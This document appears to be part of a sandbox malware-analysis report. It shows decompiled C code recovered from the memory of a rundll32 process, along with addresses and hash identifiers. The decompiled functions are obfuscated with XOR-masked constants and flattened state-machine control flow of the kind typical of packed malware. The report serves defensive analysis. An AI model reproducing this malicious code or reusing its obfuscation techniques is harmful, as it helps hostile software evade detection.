                                                                                                                                                            0x0038d09c
                                                                                                                                                            0x0038d0db
                                                                                                                                                            0x0038d0e7
                                                                                                                                                            0x0038d0e7
                                                                                                                                                            0x0038d1bc
                                                                                                                                                            0x0038d1c5

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
                                                                                                                                                            • API String ID: 1514166925-553023378
                                                                                                                                                            • Opcode ID: 2bc31844bece6b4c86398259bef343bec7728b8658e81dff346adaa1b87d7edd
                                                                                                                                                            • Instruction ID: f9d542c0d50017c0a46ebfb4a9f1c2c05e281fdf454da70a5207c98bdf583674
                                                                                                                                                            • Opcode Fuzzy Hash: 2bc31844bece6b4c86398259bef343bec7728b8658e81dff346adaa1b87d7edd
                                                                                                                                                            • Instruction Fuzzy Hash: 79021EB15083819FD3A5DF25C98AA8BFBF5BBC4718F10891DF1D986260D7B1894ACF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E003770B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				char _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				void* _t276;
                                                                                                                                                            				intOrPtr _t301;
                                                                                                                                                            				void* _t302;
                                                                                                                                                            				intOrPtr _t305;
                                                                                                                                                            				void* _t306;
                                                                                                                                                            				intOrPtr _t312;
                                                                                                                                                            				intOrPtr* _t314;
                                                                                                                                                            				void* _t316;
                                                                                                                                                            				intOrPtr _t340;
                                                                                                                                                            				signed int _t343;
                                                                                                                                                            				signed int _t344;
                                                                                                                                                            				signed int _t345;
                                                                                                                                                            				signed int _t346;
                                                                                                                                                            				signed int _t347;
                                                                                                                                                            				signed int _t348;
                                                                                                                                                            				signed int _t349;
                                                                                                                                                            				signed int* _t352;
                                                                                                                                                            
                                                                                                                                                            				_t342 = _a4;
                                                                                                                                                            				_t314 = __edx;
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t276);
                                                                                                                                                            				_v8 = 0xc5496b;
                                                                                                                                                            				_t340 = 0;
                                                                                                                                                            				_v4 = 0;
                                                                                                                                                            				_t352 =  &(( &_v128)[5]);
                                                                                                                                                            				_v96 = 0xa893e5;
                                                                                                                                                            				_v96 = _v96 >> 0xb;
                                                                                                                                                            				_t316 = 0x77ea95;
                                                                                                                                                            				_v96 = _v96 ^ 0xaec74c08;
                                                                                                                                                            				_v96 = _v96 + 0xffff5908;
                                                                                                                                                            				_v96 = _v96 ^ 0xaec6b223;
                                                                                                                                                            				_v120 = 0x460837;
                                                                                                                                                            				_v120 = _v120 << 0xe;
                                                                                                                                                            				_t343 = 0x61;
                                                                                                                                                            				_v120 = _v120 / _t343;
                                                                                                                                                            				_v120 = _v120 ^ 0xba448c5d;
                                                                                                                                                            				_v120 = _v120 ^ 0xbb13b056;
                                                                                                                                                            				_v100 = 0x5f60bb;
                                                                                                                                                            				_t344 = 0x67;
                                                                                                                                                            				_v100 = _v100 / _t344;
                                                                                                                                                            				_v100 = _v100 << 2;
                                                                                                                                                            				_v100 = _v100 << 0xe;
                                                                                                                                                            				_v100 = _v100 ^ 0xed0e0000;
                                                                                                                                                            				_v104 = 0xcda695;
                                                                                                                                                            				_t345 = 0x65;
                                                                                                                                                            				_v104 = _v104 * 0x11;
                                                                                                                                                            				_v104 = _v104 + 0xffffbfc8;
                                                                                                                                                            				_v104 = _v104 / _t345;
                                                                                                                                                            				_v104 = _v104 ^ 0x00229cab;
                                                                                                                                                            				_v88 = 0xcb9151;
                                                                                                                                                            				_v88 = _v88 + 0x59e9;
                                                                                                                                                            				_v88 = _v88 ^ 0x7c8ac0da;
                                                                                                                                                            				_v88 = _v88 >> 0xc;
                                                                                                                                                            				_v88 = _v88 ^ 0x0007c412;
                                                                                                                                                            				_v124 = 0xc27732;
                                                                                                                                                            				_v124 = _v124 << 5;
                                                                                                                                                            				_v124 = _v124 * 0x69;
                                                                                                                                                            				_v124 = _v124 >> 0xd;
                                                                                                                                                            				_v124 = _v124 ^ 0x0007c2e3;
                                                                                                                                                            				_v108 = 0xd451e;
                                                                                                                                                            				_v108 = _v108 | 0x03d9c36b;
                                                                                                                                                            				_v108 = _v108 << 0x10;
                                                                                                                                                            				_v108 = _v108 >> 7;
                                                                                                                                                            				_v108 = _v108 ^ 0x018efe00;
                                                                                                                                                            				_v24 = 0xe3266e;
                                                                                                                                                            				_v24 = _v24 ^ 0xb39ac5a6;
                                                                                                                                                            				_v24 = _v24 ^ 0xb37ebd00;
                                                                                                                                                            				_v60 = 0xdd6dbc;
                                                                                                                                                            				_v60 = _v60 << 0xc;
                                                                                                                                                            				_v60 = _v60 >> 0xd;
                                                                                                                                                            				_v60 = _v60 ^ 0x00066ea0;
                                                                                                                                                            				_v92 = 0xdc27c1;
                                                                                                                                                            				_v92 = _v92 ^ 0xb7b3afa8;
                                                                                                                                                            				_t346 = 0x51;
                                                                                                                                                            				_v92 = _v92 / _t346;
                                                                                                                                                            				_v92 = _v92 >> 0xb;
                                                                                                                                                            				_v92 = _v92 ^ 0x000e15f4;
                                                                                                                                                            				_v28 = 0x55985f;
                                                                                                                                                            				_t347 = 0x64;
                                                                                                                                                            				_v28 = _v28 * 0x1f;
                                                                                                                                                            				_v28 = _v28 ^ 0x0a58c7ef;
                                                                                                                                                            				_v64 = 0x4cb0ae;
                                                                                                                                                            				_v64 = _v64 * 0x59;
                                                                                                                                                            				_v64 = _v64 + 0xffff44f7;
                                                                                                                                                            				_v64 = _v64 ^ 0x1aa02a50;
                                                                                                                                                            				_v32 = 0x4c255b;
                                                                                                                                                            				_v32 = _v32 >> 0xc;
                                                                                                                                                            				_v32 = _v32 ^ 0x000ba021;
                                                                                                                                                            				_v68 = 0x1bdf1a;
                                                                                                                                                            				_v68 = _v68 << 0xe;
                                                                                                                                                            				_v68 = _v68 << 8;
                                                                                                                                                            				_v68 = _v68 ^ 0xc683e60f;
                                                                                                                                                            				_v36 = 0xeace7c;
                                                                                                                                                            				_v36 = _v36 ^ 0x32d1e31b;
                                                                                                                                                            				_v36 = _v36 ^ 0x32395a0e;
                                                                                                                                                            				_v52 = 0x5778bf;
                                                                                                                                                            				_v52 = _v52 * 0x53;
                                                                                                                                                            				_v52 = _v52 ^ 0x1c501c28;
                                                                                                                                                            				_v56 = 0x56e07;
                                                                                                                                                            				_v56 = _v56 / _t347;
                                                                                                                                                            				_v56 = _v56 ^ 0x000a0e4e;
                                                                                                                                                            				_v128 = 0x2ec397;
                                                                                                                                                            				_v128 = _v128 + 0xffff4016;
                                                                                                                                                            				_v128 = _v128 ^ 0xc29a5f5c;
                                                                                                                                                            				_v128 = _v128 << 0xa;
                                                                                                                                                            				_v128 = _v128 ^ 0xd1754ce1;
                                                                                                                                                            				_v112 = 0x486dea;
                                                                                                                                                            				_t159 =  &_v112; // 0x486dea
                                                                                                                                                            				_t348 = 0x16;
                                                                                                                                                            				_v112 =  *_t159 * 0x75;
                                                                                                                                                            				_v112 = _v112 << 3;
                                                                                                                                                            				_v112 = _v112 + 0xffff4e4a;
                                                                                                                                                            				_v112 = _v112 ^ 0x08d01f1a;
                                                                                                                                                            				_v116 = 0xad5672;
                                                                                                                                                            				_v116 = _v116 << 0xa;
                                                                                                                                                            				_v116 = _v116 * 0x32;
                                                                                                                                                            				_v116 = _v116 >> 1;
                                                                                                                                                            				_v116 = _v116 ^ 0x35c1a461;
                                                                                                                                                            				_v40 = 0x750aef;
                                                                                                                                                            				_v40 = _v40 << 0xe;
                                                                                                                                                            				_v40 = _v40 ^ 0x42b6a378;
                                                                                                                                                            				_v72 = 0x7e8fee;
                                                                                                                                                            				_v72 = _v72 << 0xe;
                                                                                                                                                            				_v72 = _v72 + 0x885b;
                                                                                                                                                            				_v72 = _v72 ^ 0xa3f43c0d;
                                                                                                                                                            				_v44 = 0x717d1a;
                                                                                                                                                            				_v44 = _v44 >> 0xf;
                                                                                                                                                            				_v44 = _v44 ^ 0x000f68d6;
                                                                                                                                                            				_v48 = 0x815897;
                                                                                                                                                            				_v48 = _v48 / _t348;
                                                                                                                                                            				_v48 = _v48 ^ 0x000d4a68;
                                                                                                                                                            				_v76 = 0xfbb4ce;
                                                                                                                                                            				_v76 = _v76 << 8;
                                                                                                                                                            				_v76 = _v76 + 0xffffed69;
                                                                                                                                                            				_v76 = _v76 ^ 0xfbbe0169;
                                                                                                                                                            				_v80 = 0xf07394;
                                                                                                                                                            				_v80 = _v80 << 0xf;
                                                                                                                                                            				_v80 = _v80 ^ 0x34c45092;
                                                                                                                                                            				_v80 = _v80 ^ 0x0d009df4;
                                                                                                                                                            				_v84 = 0xfdde74;
                                                                                                                                                            				_v84 = _v84 * 0x78;
                                                                                                                                                            				_v84 = _v84 << 7;
                                                                                                                                                            				_v84 = _v84 << 0xa;
                                                                                                                                                            				_v84 = _v84 ^ 0x8cc67a91;
                                                                                                                                                            				_v20 = 0xbaf80d;
                                                                                                                                                            				_t349 = 0x4e;
                                                                                                                                                            				_v20 = _v20 / _t349;
                                                                                                                                                            				_v20 = _v20 ^ 0x000183d9;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t316 != 0x77ea95) {
                                                                                                                                                            						if(_t316 == 0x220b753) {
                                                                                                                                                            							_t301 =  *0x393dfc; // 0x0
                                                                                                                                                            							_t302 = E00385B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
                                                                                                                                                            							_t352 =  &(_t352[0x10]);
                                                                                                                                                            							if(_t302 == _v88) {
                                                                                                                                                            								_t316 = 0xd86d689;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t316 == 0xd7ced6e) {
                                                                                                                                                            								_t305 =  *0x393dfc; // 0x0
                                                                                                                                                            								_t306 = E00385B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
                                                                                                                                                            								_t352 =  &(_t352[0x10]);
                                                                                                                                                            								if(_t306 == _v108) {
                                                                                                                                                            									 *_t314 = _v16;
                                                                                                                                                            									_t340 = 1;
                                                                                                                                                            									 *((intOrPtr*)(_t314 + 4)) = _v12;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t316 = 0xf392ab6;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t316 == 0xd86d689) {
                                                                                                                                                            									_push(_t316);
                                                                                                                                                            									_push(_t316);
                                                                                                                                                            									_t312 = E00377FF2(_v12);
                                                                                                                                                            									_v16 = _t312;
                                                                                                                                                            									if(_t312 != 0) {
                                                                                                                                                            										_t316 = 0xd7ced6e;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t316 != 0xf392ab6) {
                                                                                                                                                            										goto L14;
                                                                                                                                                            									} else {
                                                                                                                                                            										E00388519(_v84, _v20, _v16);
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L17:
                                                                                                                                                            						return _t340;
                                                                                                                                                            					}
                                                                                                                                                            					_t316 = 0x220b753;
                                                                                                                                                            					L14:
                                                                                                                                                            				} while (_t316 != 0xf4b6a65);
                                                                                                                                                            				goto L17;
                                                                                                                                                            			}




















































                                                                                                                                                            0x003773dc
                                                                                                                                                            0x003773ea
                                                                                                                                                            0x003773ee
                                                                                                                                                            0x003773f6
                                                                                                                                                            0x003773fe
                                                                                                                                                            0x00377403
                                                                                                                                                            0x0037740b
                                                                                                                                                            0x00377413
                                                                                                                                                            0x0037741b
                                                                                                                                                            0x00377420
                                                                                                                                                            0x00377428
                                                                                                                                                            0x00377430
                                                                                                                                                            0x0037743d
                                                                                                                                                            0x00377443
                                                                                                                                                            0x00377448
                                                                                                                                                            0x0037744d
                                                                                                                                                            0x00377455
                                                                                                                                                            0x00377463
                                                                                                                                                            0x0037746b
                                                                                                                                                            0x0037746f
                                                                                                                                                            0x00377477
                                                                                                                                                            0x00377477
                                                                                                                                                            0x00377485
                                                                                                                                                            0x00377592
                                                                                                                                                            0x003775a6
                                                                                                                                                            0x003775ab
                                                                                                                                                            0x003775b2
                                                                                                                                                            0x003775b4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003775b4
                                                                                                                                                            0x0037748b
                                                                                                                                                            0x00377491
                                                                                                                                                            0x00377531
                                                                                                                                                            0x00377542
                                                                                                                                                            0x00377547
                                                                                                                                                            0x0037754e
                                                                                                                                                            0x003775d7
                                                                                                                                                            0x003775d9
                                                                                                                                                            0x003775e1
                                                                                                                                                            0x00377550
                                                                                                                                                            0x00377550
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00377550
                                                                                                                                                            0x00377493
                                                                                                                                                            0x00377499
                                                                                                                                                            0x003774d4
                                                                                                                                                            0x003774d5
                                                                                                                                                            0x003774d6
                                                                                                                                                            0x003774db
                                                                                                                                                            0x003774e6
                                                                                                                                                            0x003774ec
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003774ec
                                                                                                                                                            0x0037749b
                                                                                                                                                            0x003774a1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003774a7
                                                                                                                                                            0x003774b6
                                                                                                                                                            0x003774bb
                                                                                                                                                            0x003774a1
                                                                                                                                                            0x00377499
                                                                                                                                                            0x00377491
                                                                                                                                                            0x003775e4
                                                                                                                                                            0x003775f0
                                                                                                                                                            0x003775f0
                                                                                                                                                            0x003775be
                                                                                                                                                            0x003775c0
                                                                                                                                                            0x003775c0
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                                                            • API String ID: 0-2314355462
                                                                                                                                                            • Opcode ID: bc57560a37894aac4829d5467682d3cffdae0f3724cb4e1124b770e7585cf60c
                                                                                                                                                            • Instruction ID: 6e257dc212e2f0a4f3eb1e1aad0e7977bd96435b6817beb1ff51d3c49a9138de
                                                                                                                                                            • Opcode Fuzzy Hash: bc57560a37894aac4829d5467682d3cffdae0f3724cb4e1124b770e7585cf60c
                                                                                                                                                            • Instruction Fuzzy Hash: 91D10E7110C3819FC765CF66C88995BFBE2BBC4748F50891DF2A68A220C7B6C949CF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                            			E0038C631(void* __ecx) {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				unsigned int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				void* _t214;
                                                                                                                                                            				void* _t220;
                                                                                                                                                            				void* _t224;
                                                                                                                                                            				void* _t228;
                                                                                                                                                            				void* _t229;
                                                                                                                                                            				void* _t233;
                                                                                                                                                            				void* _t234;
                                                                                                                                                            				signed int _t236;
                                                                                                                                                            				signed int _t237;
                                                                                                                                                            				signed int _t238;
                                                                                                                                                            				void* _t248;
                                                                                                                                                            				void* _t249;
                                                                                                                                                            				signed int* _t251;
                                                                                                                                                            				void* _t254;
                                                                                                                                                            
                                                                                                                                                            				_t251 =  &_v92;
                                                                                                                                                            				_t234 = __ecx;
                                                                                                                                                            				_v56 = 0x6c25e6;
                                                                                                                                                            				_v56 = _v56 >> 0xf;
                                                                                                                                                            				_v56 = _v56 >> 0xd;
                                                                                                                                                            				_v56 = _v56 ^ 0x000b07b8;
                                                                                                                                                            				_v60 = 0xfeb19f;
                                                                                                                                                            				_v60 = _v60 | 0xe5cfed25;
                                                                                                                                                            				_v60 = _v60 ^ 0x26a25afc;
                                                                                                                                                            				_v60 = _v60 ^ 0xc355f8a5;
                                                                                                                                                            				_v20 = 0x71f317;
                                                                                                                                                            				_v20 = _v20 >> 1;
                                                                                                                                                            				_v20 = _v20 ^ 0x003a157d;
                                                                                                                                                            				_v64 = 0x229c82;
                                                                                                                                                            				_v64 = _v64 >> 6;
                                                                                                                                                            				_v64 = _v64 + 0x6845;
                                                                                                                                                            				_v64 = _v64 ^ 0x000e1a2d;
                                                                                                                                                            				_v80 = 0xaa3c23;
                                                                                                                                                            				_v80 = _v80 + 0x9f20;
                                                                                                                                                            				_v80 = _v80 + 0x8b23;
                                                                                                                                                            				_v80 = _v80 | 0x21cd8be9;
                                                                                                                                                            				_v80 = _v80 ^ 0x21ed2977;
                                                                                                                                                            				_v84 = 0xa275e1;
                                                                                                                                                            				_v84 = _v84 >> 0xd;
                                                                                                                                                            				_t248 = 0;
                                                                                                                                                            				_t236 = 0x36;
                                                                                                                                                            				_v84 = _v84 / _t236;
                                                                                                                                                            				_v84 = _v84 | 0x6f301759;
                                                                                                                                                            				_t249 = 0xe982267;
                                                                                                                                                            				_v84 = _v84 ^ 0x6f339045;
                                                                                                                                                            				_v88 = 0x6e61be;
                                                                                                                                                            				_v88 = _v88 ^ 0xaf54e0d1;
                                                                                                                                                            				_v88 = _v88 >> 4;
                                                                                                                                                            				_v88 = _v88 | 0xfa70c1e6;
                                                                                                                                                            				_v88 = _v88 ^ 0xfaf0db59;
                                                                                                                                                            				_v8 = 0x2c245a;
                                                                                                                                                            				_v8 = _v8 << 8;
                                                                                                                                                            				_v8 = _v8 ^ 0x2c2bf9b3;
                                                                                                                                                            				_v36 = 0xcb696d;
                                                                                                                                                            				_v36 = _v36 >> 4;
                                                                                                                                                            				_v36 = _v36 << 5;
                                                                                                                                                            				_v36 = _v36 ^ 0x019dc7aa;
                                                                                                                                                            				_v76 = 0xb5019c;
                                                                                                                                                            				_v76 = _v76 + 0xffffd3ce;
                                                                                                                                                            				_t237 = 0x3a;
                                                                                                                                                            				_v76 = _v76 / _t237;
                                                                                                                                                            				_v76 = _v76 + 0xe675;
                                                                                                                                                            				_v76 = _v76 ^ 0x000db5c6;
                                                                                                                                                            				_v40 = 0x1e681a;
                                                                                                                                                            				_t238 = 0x22;
                                                                                                                                                            				_v40 = _v40 / _t238;
                                                                                                                                                            				_v40 = _v40 + 0x9449;
                                                                                                                                                            				_v40 = _v40 ^ 0x00094c29;
                                                                                                                                                            				_v12 = 0x15a3d6;
                                                                                                                                                            				_v12 = _v12 * 0x6f;
                                                                                                                                                            				_v12 = _v12 ^ 0x096cbb26;
                                                                                                                                                            				_v44 = 0x420567;
                                                                                                                                                            				_v44 = _v44 * 0x2b;
                                                                                                                                                            				_v44 = _v44 >> 8;
                                                                                                                                                            				_v44 = _v44 ^ 0x0004b329;
                                                                                                                                                            				_v24 = 0xd75fdc;
                                                                                                                                                            				_v24 = _v24 + 0x1e6b;
                                                                                                                                                            				_v24 = _v24 ^ 0x00df7832;
                                                                                                                                                            				_v92 = 0x2978f4;
                                                                                                                                                            				_v92 = _v92 ^ 0x1aa3462f;
                                                                                                                                                            				_v92 = _v92 * 0x3a;
                                                                                                                                                            				_v92 = _v92 | 0xa828e589;
                                                                                                                                                            				_v92 = _v92 ^ 0xab738ef3;
                                                                                                                                                            				_v28 = 0xea47cd;
                                                                                                                                                            				_v28 = _v28 * 0x68;
                                                                                                                                                            				_v28 = _v28 ^ 0x5f2069e4;
                                                                                                                                                            				_v16 = 0x52c32f;
                                                                                                                                                            				_v16 = _v16 | 0xda6d254c;
                                                                                                                                                            				_v16 = _v16 ^ 0xda7308ab;
                                                                                                                                                            				_v48 = 0xc39de2;
                                                                                                                                                            				_v48 = _v48 ^ 0x402eeacb;
                                                                                                                                                            				_v48 = _v48 + 0xb85a;
                                                                                                                                                            				_v48 = _v48 ^ 0x40eaab85;
                                                                                                                                                            				_v52 = 0xbb994d;
                                                                                                                                                            				_v52 = _v52 | 0x0bb22e40;
                                                                                                                                                            				_v52 = _v52 ^ 0x7c36a9dd;
                                                                                                                                                            				_v52 = _v52 ^ 0x7782b78d;
                                                                                                                                                            				_v68 = 0x6ee7f1;
                                                                                                                                                            				_v68 = _v68 * 3;
                                                                                                                                                            				_v68 = _v68 * 0x65;
                                                                                                                                                            				_v68 = _v68 + 0xffffc283;
                                                                                                                                                            				_v68 = _v68 ^ 0x834839c0;
                                                                                                                                                            				_v4 = 0x2c076e;
                                                                                                                                                            				_v4 = _v4 >> 2;
                                                                                                                                                            				_v4 = _v4 ^ 0x00027705;
                                                                                                                                                            				_v32 = 0x2be47d;
                                                                                                                                                            				_v32 = _v32 >> 3;
                                                                                                                                                            				_v32 = _v32 << 0x10;
                                                                                                                                                            				_v32 = _v32 ^ 0x7c8953c8;
                                                                                                                                                            				_v72 = 0x664751;
                                                                                                                                                            				_v72 = _v72 + 0xffffb67a;
                                                                                                                                                            				_v72 = _v72 + 0xf05a;
                                                                                                                                                            				_v72 = _v72 + 0xffff370a;
                                                                                                                                                            				_v72 = _v72 ^ 0x0066b29b;
                                                                                                                                                            				goto L1;
                                                                                                                                                            				do {
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L1:
                                                                                                                                                            						_t254 = _t249 - 0xe145aac;
                                                                                                                                                            						if(_t254 > 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t254 == 0) {
                                                                                                                                                            							_push(_t238);
                                                                                                                                                            							_push(_t238);
                                                                                                                                                            							_t220 = E0037474B();
                                                                                                                                                            							_t251 =  &(_t251[2]);
                                                                                                                                                            							_t249 = 0x70e2d06;
                                                                                                                                                            							_t248 = _t248 + _t220;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t249 == 0x15047ce) {
                                                                                                                                                            								_push(_t238);
                                                                                                                                                            								_push(_t238);
                                                                                                                                                            								_t224 = E0037474B();
                                                                                                                                                            								_t251 =  &(_t251[2]);
                                                                                                                                                            								_t249 = 0xe32aaf2;
                                                                                                                                                            								_t248 = _t248 + _t224;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t249 == 0x4d33fe3) {
                                                                                                                                                            									_push(_t238);
                                                                                                                                                            									_push(_t238);
                                                                                                                                                            									_t228 = E0037474B();
                                                                                                                                                            									_t251 =  &(_t251[2]);
                                                                                                                                                            									_t249 = 0xe45b300;
                                                                                                                                                            									_t248 = _t248 + _t228;
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t249 == 0x708a22e) {
                                                                                                                                                            										_t238 = _v56;
                                                                                                                                                            										_t229 = E0038C2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
                                                                                                                                                            										_t251 =  &(_t251[3]);
                                                                                                                                                            										_t249 = 0x15047ce;
                                                                                                                                                            										_t248 = _t248 + _t229;
                                                                                                                                                            										continue;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t249 != 0x70e2d06) {
                                                                                                                                                            											goto L17;
                                                                                                                                                            										} else {
                                                                                                                                                            											_push(_t238);
                                                                                                                                                            											_push(_t238);
                                                                                                                                                            											_t233 = E0037474B();
                                                                                                                                                            											_t251 =  &(_t251[2]);
                                                                                                                                                            											_t249 = 0x4d33fe3;
                                                                                                                                                            											_t248 = _t248 + _t233;
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L20:
                                                                                                                                                            						return _t248;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t249 == 0xe32aaf2) {
                                                                                                                                                            						_push(_t238);
                                                                                                                                                            						_push(_t238);
                                                                                                                                                            						_t214 = E0037474B();
                                                                                                                                                            						_t251 =  &(_t251[2]);
                                                                                                                                                            						_t249 = 0xe145aac;
                                                                                                                                                            						_t248 = _t248 + _t214;
                                                                                                                                                            						goto L17;
                                                                                                                                                            					} else {
                                                                                                                                                            						if(_t249 == 0xe45b300) {
                                                                                                                                                            							_t248 = _t248 + E0038C2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t249 != 0xe982267) {
                                                                                                                                                            								goto L17;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t249 = 0x708a22e;
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					goto L20;
                                                                                                                                                            					L17:
                                                                                                                                                            				} while (_t249 != 0xce30a1f);
                                                                                                                                                            				goto L20;
                                                                                                                                                            			}








































                                                                                                                                                            0x0038c79a
                                                                                                                                                            0x0038c7a2
                                                                                                                                                            0x0038c7aa
                                                                                                                                                            0x0038c7b7
                                                                                                                                                            0x0038c7bb
                                                                                                                                                            0x0038c7c3
                                                                                                                                                            0x0038c7d0
                                                                                                                                                            0x0038c7d4
                                                                                                                                                            0x0038c7d9
                                                                                                                                                            0x0038c7e1
                                                                                                                                                            0x0038c7e9
                                                                                                                                                            0x0038c7f1
                                                                                                                                                            0x0038c7f9
                                                                                                                                                            0x0038c801
                                                                                                                                                            0x0038c813
                                                                                                                                                            0x0038c817
                                                                                                                                                            0x0038c81f
                                                                                                                                                            0x0038c827
                                                                                                                                                            0x0038c834
                                                                                                                                                            0x0038c838
                                                                                                                                                            0x0038c840
                                                                                                                                                            0x0038c848
                                                                                                                                                            0x0038c850
                                                                                                                                                            0x0038c858
                                                                                                                                                            0x0038c860
                                                                                                                                                            0x0038c868
                                                                                                                                                            0x0038c870
                                                                                                                                                            0x0038c878
                                                                                                                                                            0x0038c880
                                                                                                                                                            0x0038c888
                                                                                                                                                            0x0038c890
                                                                                                                                                            0x0038c898
                                                                                                                                                            0x0038c8a5
                                                                                                                                                            0x0038c8ae
                                                                                                                                                            0x0038c8b2
                                                                                                                                                            0x0038c8ba
                                                                                                                                                            0x0038c8c2
                                                                                                                                                            0x0038c8ca
                                                                                                                                                            0x0038c8cf
                                                                                                                                                            0x0038c8d7
                                                                                                                                                            0x0038c8df
                                                                                                                                                            0x0038c8e4
                                                                                                                                                            0x0038c8e9
                                                                                                                                                            0x0038c8f1
                                                                                                                                                            0x0038c8f9
                                                                                                                                                            0x0038c901
                                                                                                                                                            0x0038c909
                                                                                                                                                            0x0038c911
                                                                                                                                                            0x0038c911
